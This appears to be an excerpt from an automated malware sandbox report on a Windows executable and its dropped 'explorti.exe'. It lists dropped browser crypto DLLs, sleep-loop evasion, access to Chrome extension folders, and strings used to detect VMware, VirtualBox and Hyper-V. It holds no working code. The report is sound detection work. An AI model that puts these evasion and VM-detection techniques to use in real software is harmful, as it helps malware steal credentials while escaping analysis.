Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1052 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\1jPL5zru3u.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\1jPL5zru3u.exe TID: 6976 Thread sleep count: 238 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7368 Thread sleep time: -56028s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7352 Thread sleep count: 1102 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7352 Thread sleep time: -2205102s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7296 Thread sleep count: 410 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7296 Thread sleep time: -12300000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7600 Thread sleep time: -1080000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7344 Thread sleep count: 1052 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7344 Thread sleep time: -2105052s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3DC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C3DC930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001B5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001B5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: vmware
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000D.00000002.2373129354.0000000000D9D000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.000000000101C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ~VirtualMachineTypes
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.000000000101C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.000000000101C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: CAEHDBAAEC.exe, 00000006.00000002.1925142002.000000000072D000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 0000000A.00000002.2898993813.0000000000D9D000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000B.00000002.1962533242.0000000000D9D000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000D.00000002.2373129354.0000000000D9D000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: VMware
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001A49000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.2897406345.00000000007F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
